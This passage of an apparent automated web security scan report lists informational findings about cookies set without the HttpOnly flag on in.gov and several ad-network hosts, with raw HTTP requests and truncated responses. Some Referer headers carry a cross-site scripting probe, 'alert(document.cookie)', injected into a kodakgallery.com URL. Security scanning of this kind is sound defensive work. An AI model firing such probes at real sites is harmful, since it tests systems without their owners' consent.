...[SNIP]...

14.296. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4761888b-4251-4912-8743-09bf2fc2ed75 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256; domain=.interclick.com; expires=Fri, 30-Apr-2021 15:10:51 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 30 Apr 2011 15:10:51 GMT

GIF89a.............!.......,...........D..;

14.297. http://image.providesupport.com/js/hic/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=9k8DdjQMsyWA;Path=/;Domain=.providesupport.com
Content-Length: 4877
Date: Sat, 30 Apr 2011 22:10:03 GMT
Connection: close

var psMygbsid = "9k8DdjQMsyWA";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...

14.298. http://image.providesupport.com/js/hic/safe-textlink.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-textlink.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/hic/safe-textlink.js?ps_h=Njc9&ps_t=1304201813432&online-link-html=Live%20Chat%20Help&offline-link-html=Live%20Chat%20Help HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=YoOVBtFsUz6P;Path=/;Domain=.providesupport.com
Content-Length: 4775
Date: Sat, 30 Apr 2011 22:16:31 GMT
Connection: close

var psNjc9sid = "YoOVBtFsUz6P";
// safe-textlink@ie5up.js

var psNjc9iso;
try {
   psNjc9iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psNjc9wid != null);
} catch(e) {
   psNjc9
...[SNIP]...

14.299. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:25 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; domain=pubmatic.com; expires=Mon, 29-Apr-2013 15:08:25 GMT; path=/
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768105; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

14.300. http://in.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:33:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:34:22 GMT; path=/
Content-Length: 203267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...

14.301. http://in.gov/apps/ii/oss/agencyInfo/listing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/agencyInfo/listing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/agencyInfo/listing HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.2.10.1304126856; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
Content-Type: application/json; charset=UTF-8
Date: Sat, 30 Apr 2011 01:39:19 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 01:40:19 GMT; path=/
Content-Length: 12788

[{"class":"gov.in.oss.Agency","id":1,"active":true,"abbreviation":null,"name":"Administration, Department of","services":[{"class":"Service","id":10},{"class":"Service","id":6},{"class":"Service","id"
...[SNIP]...

14.302. http://in.gov/apps/ii/oss/agencyInfo/selection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/agencyInfo/selection

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/agencyInfo/selection HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.9
Content-Language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sat, 30 Apr 2011 12:21:06 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 12:22:06 GMT; path=/
Content-Length: 637

<html>
<head>
    <title>An error has occurred in the online services search application</title>
    <style type="text/css">
           .message {
               border: 1px solid black;
               padding: 5px;
               ba
...[SNIP]...

14.303. http://in.gov/apps/ii/oss/categoryInfo/listing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/categoryInfo/listing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/categoryInfo/listing HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.2.10.1304126856; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
Content-Type: application/json; charset=UTF-8
Date: Sat, 30 Apr 2011 01:39:11 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 01:40:11 GMT; path=/
Content-Length: 6191

[{"class":"gov.in.oss.Category","id":41,"abbr":null,"name":"About Indiana","services":[{"class":"Service","id":294},{"class":"Service","id":83},{"class":"Service","id":147},{"class":"Service","id":243
...[SNIP]...

14.304. http://in.gov/apps/ii/oss/categoryInfo/selection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/categoryInfo/selection

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/categoryInfo/selection HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.9
Content-Language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sat, 30 Apr 2011 12:21:06 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 12:22:06 GMT; path=/
Content-Length: 637

<html>
<head>
    <title>An error has occurred in the online services search application</title>
    <style type="text/css">
           .message {
               border: 1px solid black;
               padding: 5px;
               ba
...[SNIP]...

14.305. http://in.gov/apps/ii/oss/js/application.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/js/application.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/js/application.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
ETag: "6ftEOfi5uG8"
Last-Modified: Tue, 07 Sep 2010 14:59:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 373
Date: Sat, 30 Apr 2011 01:29:54 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 01:30:54 GMT; path=/

var Ajax;
if (Ajax && (Ajax != null)) {
   Ajax.Responders.register({
    onCreate: function() {
if($('spinner') && Ajax.activeRequestCount>0)
Effect.Appear('spinner',{duration:0.5,queu
...[SNIP]...

14.306. http://in.gov/apps/ii/oss/js/filterlist.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/js/filterlist.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/js/filterlist.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
ETag: "EsHqavtHqWm"
Last-Modified: Tue, 07 Sep 2010 14:59:10 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 5681
Date: Sat, 30 Apr 2011 01:29:53 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 01:30:53 GMT; path=/

/*==================================================*
$Id: filterlist.js,v 1.3 2003/10/08 17:13:49 pat Exp $
Copyright 2003 Patrick Fitzgerald
http://www.barelyfitz.com/webdesign/articles/filterlis
...[SNIP]...

14.307. http://in.gov/apps/ii/oss/mostPopularInfo/selection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/mostPopularInfo/selection

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/mostPopularInfo/selection HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.2.10.1304126856; BIGipServerwww.IN.gov-http=1916078090.20480.0000; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
Content-Type: application/json; charset=UTF-8
Date: Sat, 30 Apr 2011 01:39:19 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 01:40:20 GMT; path=/
Content-Length: 4366

[{"id":65,"name":"BMV - Plates and Registrations","description":"Renew your registrations online and order your plates with express delivery that guarantees you will receive them in three business day
...[SNIP]...

14.308. http://in.gov/apps/ii/oss/search/term  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /apps/ii/oss/search/term

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ii/oss/search/term HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.9
Content-Language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sat, 30 Apr 2011 12:21:06 GMT
Set-Cookie: BIGipServerapps_ii_oss=4046653450.36895.0000; expires=Sat, 30-Apr-2011 12:22:06 GMT; path=/
Content-Length: 637

<html>
<head>
    <title>An error has occurred in the online services search application</title>
    <style type="text/css">
           .message {
               border: 1px solid black;
               padding: 5px;
               ba
...[SNIP]...

14.309. http://in.gov/core/agriculture.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/agriculture.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/agriculture.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:56 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:39:56 GMT; path=/
Content-Length: 197041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Instan
...[SNIP]...

14.310. http://in.gov/core/business.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/business.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/business.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.2.10.1304126856; WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:41:21 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1899300874.20480.0000; expires=Sat, 30-Apr-2011 01:42:21 GMT; path=/
Content-Length: 199220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Instan
...[SNIP]...

14.311. http://in.gov/core/css/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/css/global.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/css/global.css HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:54 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 21:59:44 GMT
ETag: "f60c85-9a2f-49ce619141400"
Accept-Ranges: bytes
Content-Length: 39471
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:54 GMT; path=/

@charset "utf-8";

/* CSS Document */

#toplinks #textlinks .amberalert,
#header ul.right_side li#amber_alert {display:none;}
#toplinks #textlinks .amberalert a {color:#FF0000; font-weight:bolder;}

h
...[SNIP]...

14.312. http://in.gov/core/css/global2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/css/global2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/css/global2.css HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:56 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 21:54:58 GMT
ETag: "13ec1d-a382-49ce608081080"
Accept-Ranges: bytes
Content-Length: 41858
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:27:56 GMT; path=/

@charset "utf-8";

/* CSS Document */

#toplinks #textlinks .amberalert, #header ul.right_side li#amber_alert { display:none; }

#toplinks #textlinks .amberalert a { color:#FF0000; font-weight:bolder;
...[SNIP]...

14.313. http://in.gov/core/images/advanced_search-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/images/advanced_search-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/images/advanced_search-bg.gif HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
